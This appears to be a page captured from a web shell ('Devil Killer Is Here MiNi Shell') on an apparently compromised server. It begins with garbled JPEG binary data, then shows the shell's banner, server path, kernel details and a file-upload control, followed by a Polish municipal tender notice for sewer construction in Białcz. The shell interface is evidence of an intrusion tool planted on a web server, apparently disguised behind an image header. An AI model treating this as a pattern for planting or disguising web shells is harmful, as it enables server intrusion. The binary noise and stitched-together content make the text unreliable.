JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220427/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220427/0013662901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Budowa kanalizacji w miejscowości Białcz&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CHRZYPSKO WIELKIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631259264</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Główna 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chrzypsko Wielkie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-412</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">srodkiunijne@chrzypsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chrzypsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Budowa kanalizacji w miejscowości Białcz&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4115debe-c55f-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00136629</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037820/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa kanalizacji w miejscowości Białcz</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.chrzypsko.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski (inne niż oferta), zawiadomienia oraz informacje przekazywane są w przy użyciu:<br/>1) miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/<br/>2) ePUAPu, dostępnego pod adresem: /4fflau664z/zamowienia<br/>3) poczty elektronicznej (e-mail): srodkiunijne@chrzypsko.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. Pozostałe postanowienia zapisano w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. <br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych) (dz. Urz. UE L 119 z 04.05.2016), (dalej „RODO”) informujemy, że:<br/>1.	Administratorem danych osobowych jest Wójt Gminy Chrzypsko Wielkie z siedzibą Urzędu Gminy przy ul. Głównej 15, 64-412 Chrzypsko Wielkie, tel.: 61 29 51 011, fax: 61 62 10 890, e-mail: urzad@chrzypsko.pl; <br/>2.	Podstawą prawną przetwarzania danych osobowych jest ustawa z dnia 11.09.2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019, z 2020 r. poz. 288, 875, 1492, 1517, 2275, 2320, z 2021 r. poz. 464) w związku z art. 6 ust. 1 RODO. <br/>3.	Przetwarzanie danych osobowych ma miejsce m.in. w następujących celach:<br/>1)	przeprowadzenia postępowania o udzielenie zamówienia publicznego przez co należy rozumieć postępowanie wszczynane w drodze publicznego ogłoszenia o zamówieniu lub przesłanie zaproszenia do składania ofert albo przesłanie zaproszenia do negocjacji w celu dokonania wyboru oferty wykonawcy, z którym zostanie zawarta umowa w sprawie zamówienia publicznego, lub – w przypadku trybu zamówienia z wolnej ręki - w celu wynegocjowania postanowień takiej umowy; <br/>2)	weryfikacji wiarygodności płatniczej i podatkowej kontrahenta [ustawa z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz.U.2020.106 t.j. z pózn. zm.)] –przez okres niezbędny do dokonania takiej oceny przy zawarciu, przedłużeniu lub rozszerzeniu zakresu umowy. <br/>7. Zgodnie z art. 78 ust.1ustawy Pzp zamawiający przechowuje protokół postępowania wraz z załącznikami przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia. Jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, zamawiający przechowuje protokół postępowania wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego. <br/>8. W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego uczestnikom postępowań przysługują:▪prawo dostępu do swoich danych oraz otrzymania ich kopii;▪prawo do sprostowania (poprawiania) swoich danych;▪prawo do ograniczenia przetwarzania danych, ,▪prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. <br/>9. Uczestnikom postępowań o udzielenie zamówienia publicznego w trybie ustawy Pzp nie przysługują: a)prawo do usunięcia danych osobowych(art. 17 ust. 3 lit. b, d lub e RODO); b)prawo do przenoszenia danych osobowych(art. 20 RODO); c)prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c (art. 21) RODO. <br/>12. Prawo do skargi: przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych z siedzibą przy ul. Stawki 2, 00-193 Warszawa, tel.22 531 03 00.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FU. 271.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Opis zamówienia.<br/>Przedmiotem zamówienia jest wykonanie sieci kanalizacji sanitarnej z włączeniem do istniejącej sieci kanalizacyjnej.<br/><br/>2.	Zakres elementów zadania:<br/>Do wykonania zaprojektowano sieć kanalizacji sanitarnej z rur PVC łączonych na uszczelkę gumową typu ciężkiego „S”, o średnicy 315, 250, 200 klasy ciężkiej – LITA – SDR 34, SN 8, producentów posiadających ISO 9001, ISO 14001.<br/>Na sieci kanalizacyjnej wykonać studnie rewizyjne betonowe  1000 – beton klasy B-45, W-8 wodoszczelny, łączony na uszczelkę gumową z przejściami szczelnymi. Wszystkie studzienki muszą być wykonane jako prefabrykowane z betonu klasy B 45, W8.<br/>Studnie wyposażyć w fabrycznie montowane stopnie złazowe.<br/>Studnie betonowe z włazem kanałowym – klasy D 400 okrągły z wkładką gumową – właz żeliwny <br/>z wypełnieniem betonowym włączenie do istniejącego kanału zgodnie z projektem.<br/>Wykonać 2 przepompownie ścieków z betonu średnicy 1500 z pompami typu Hydro-Vacuum S.A. lokalizacja przepompowni:<br/>•	przepompownia ścieków P-1 Białcz – działka nr 46/2 lokalizacja zgodnie z PZT,<br/>•	przepompownia ścieków P-3 Białcz – działka 55/1 lokalizacja zgodnie z PZT.<br/>Skrzyżowanie kanalizacji sanitarnej z istniejącym gazociągiem wysokiego ciśnienia DN 250 wykonać na warunkach Polskiej Spółki Gazownictwa Sp. z o.o. Poznań – uzgodnienie PSGPO.ZMSM.773.5004.100856.22 z dnia 28 stycznia 2022 r.<br/>Zakres sieci kanalizacyjnej zgodnie z projektem o długości łącznej: 3 572,87 m, w tym:<br/>•	kanalizacja sanitarna grawitacyjna PVC 315, 250, 200: 2 546 m,<br/>•	kanalizacja sanitarna tłoczna PE 125, 90: 1 026,87 m.<br/>Roboty do wykonania obejmują:<br/>•	kanały z rur kanalizacyjnych PVC łączonych na wcisk – rury łącznie z uszczelką typu EURO – trójwargowe o średnicy 315, 250, 200 klasy ciężkiej – S, SN 8, S-16, 7 – SDR 34 – obszar stosowania D i U – LITE, producentów posiadających certyfikat ISO-9001, ISO-14001,<br/>•	rurociągi tłoczne z rur:<br/>PEHD PE 100 PN 16 SDR 11 – DN 125 x 11,4 – 730,59 m,<br/>PEHD PE 100 RC PN 16 SDR 11 – DN 90 x 8,2 – 296,87 m,<br/>•	studnie betonowe 1000 mm – beton klasy B-45, W-8, łączony na uszczelkę gumową, betonowy element denny ze spocznikiem oraz z przejściami szczelnymi wykonanymi z odpornego na działanie ścieków tworzywa sztucznego – polipropylenu tworzący monolit wg DIN 4034, właz typu ciężkiego z wypełnieniem betonowym oraz odpowietrzeniem,<br/>•	studzienki kanalizacyjne systemowe o średnicy 425 mm, spełniające pozytywne wyniki testów hydraulicznych wg DS. 2379, rury teleskopowe PVC ze ścianką – LITĄ, odporne na obciążenia dynamiczne od ruchu, połączenie rury teleskopowej z włazem rozłączne na zaczepy – producent posiadający certyfikaty ISO 9001, ISO 14001, możliwość regulacji wysokości studzienki poprzez przycięcie rury co 5 cm, kinety prefabrykowane monolityczne z wbudowanym spadkiem dna 1,5%, właz żeliwny zgodnie z PN-EN 124-1:2000 posiadający certyfikat IO lub Cert,<br/>•	przepompownie ścieków – średnicy 1500 – 2 szt., zbiornik wykonany z betonu B-45, W-8, pompy zatapialne z silnikiem typu supervortex, instalacja tłoczna kwasoodporna, szafa sterownicza wyposażona w układ przepłukiwania rurociągu tłocznego, FILTR antyodorowy, podest roboczy, zasuwy odcinające, wentylacje, drabinka złazowa wraz z posadowieniem <br/>i rozruchem – zgodnie ze schematem przepompowni – nr PŚ 3, PŚ 1,<br/>•	przykanaliki o średnicy 160 – rura PVC klasy ciężkiej – LITE producentów posiadających certyfikat ISO 9001, ISO 14001.<br/>Roboty ziemne związane z budową kanalizacji sanitarnej powinny być prowadzone zgodnie z przepisami i obowiązującymi normami oraz zgodnie ze Specyfikacją Techniczną dołączoną do projektu.<br/><br/>3.	W wyniku powyższego powstanie:<br/>sieci kanalizacyjnej o długości łącznej: 3 572,87 m, w tym:<br/>•	kanalizacja sanitarna grawitacyjna: 2 546 m,<br/>•	kanalizacja sanitarna tłoczna: 1 026,87 m.<br/><br/>4.	Wytyczne dla wykonawcy:<br/>•	wykonawca zobowiązany jest do dokonania wizji terenowej (na własny koszt) oraz do uzyskania wszelkich informacji niezbędnych do wyceny i wykonania tego zadania, wizja terenowa powinna być odnotowana u Zamawiającego<br/>•	przed zakupem potrzebnych elementów należy dokonać pomiarów z natury,<br/>•	Zamawiający wymaga, aby sposób prowadzenia zamówienia zapewniał utrzymanie ruchu i dojazd, Wykonawca zobowiązany jest do sporządzenia i przedłożenia Zamawiającemu czasowego planu organizacji ruchu, jeżeli będzie to konieczne,<br/>•	wszelkie opłaty wynikające ze szkód na etapie realizacji zamówienia ponosi Wykonawca,<br/>•	przy wykopach liniowych Zamawiający nie wymaga całkowitej wymiany gruntów w zależności od rodzaju gruntu rodzimego, minimalny poziom wymiany gruntów wynosi 50 %.<br/><br/>5.	Zasady zachowania konkurencyjności:<br/>•	w przypadku, gdy w projekcie lub opisie przedmiotu zamówienia podano nazwy materiałów, produktów lub urządzeń konkretnych producentów, należy to traktować jako określenie żądanego standardu i jakości,<br/>•	Zamawiający dopuszcza rozwiązania równoważne opisanym, we wszystkich takich sytuacjach wykonawca może zaoferować materiały, produkty lub urządzania o co najmniej takich samych parametrach,<br/>•	Wykonawca zobowiązany jest wykazać równoważność zastosowanych materiałów i rozwiązań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232410-9 - Roboty w zakresie kanalizacji ściekowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena (C) – waga kryterium 100%<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 100 %<br/>CN *<br/>C = ------------- x 100 pkt x 100 %<br/>CO<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>gdzie :<br/>C - oznacza liczbę punktów uzyskanych w kryterium cena oferty brutto (z dokładnością<br/>do dwóch miejsc po przecinku), 1 % = 1 pkt<br/>CN - oznacza cenę brutto najtańszej z ofert,<br/>CO - oznacza cenę brutto ocenianej oferty.<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>3. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z formularzem oferty (załącznik nr 1) Wykonawca zobowiązany jest dołączyć:<br/>1) aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania na podstawie art. 108 ust. 1 i 109 ust. 1 pkt. 4, 5, 7 ustawy Prawo zamówień publicznych (Załącznik nr 3 do SWZ);<br/>2) W przypadku gdy wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu powoła się na zasoby innych podmiotów przy realizacji zamówienia do oferty załącza oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu (Załącznik nr 4 do SWZ);<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców – w/w oświadczenia składają każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia mają potwierdzać brak podstaw do wykluczenia.<br/>Oświadczenia, o których mowa w pkt. 1 – 3 składa się, pod rygorem nieważności w formie elektronicznej (kwalifikowany podpis elektroniczny) lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1.	Za wykonanie przedmiotu umowy, określonego w § 1 niniejszej umowy, Strony ustalają wynagrodzenie ryczałtowe w wysokości: netto: ……………….. złotych (słownie:…………………………………………………………..) + VAT, brutto: ………………………… złotych (słownie:………………………………………………………………………..).<br/>2.	Wynagrodzenie ryczałtowe o którym mowa w ust. 1 obejmuje wszystkie koszty związane z realizacją prac i robót objętych umową, w tym ryzyko Wykonawcy z tytułu oszacowania wszelkich kosztów związanych z realizacją przedmiotu umowy a także oddziaływania innych czynników mających <br/>lub mogących mieć wpływ na koszty.<br/>3.	Nie przewiduje się możliwości wzrostu wynagrodzenia określonego w ust. 1 bez względu na zmianę stosunków. Wyjątek dotyczy zmiany wysokości wynagrodzenia należnego wykonawcy w przypadku zmiany stawki podatku od towarów i usług.<br/>4.	Zgodnie z wymogiem udzielonej przez BGK – Wstępnej promesy dofinansowania inwestycji, Zamawiający udzieli Wykonawcy zaliczki w wysokości 20 % wynagrodzenia brutto wskazanego w § 3 ust. 1, <br/>na podstawie prawidłowo wystawionej i doręczonej przez Wykonawcę faktury zaliczkowej, w terminie <br/>30 dni od dnia jej doręczenia, na rachunek bankowy wskazany w fakturze.<br/>5.	Wynagrodzenie Wykonawcy zostanie wypłacone po zrealizowaniu pełnego zakresu przedmiotu umowy na podstawie końcowej faktury VAT oraz zatwierdzonego przez Zamawiającego niezawierającego żadnych uwag protokołu odbioru końcowego robót podpisanego przez Wykonawcę, Inspektora 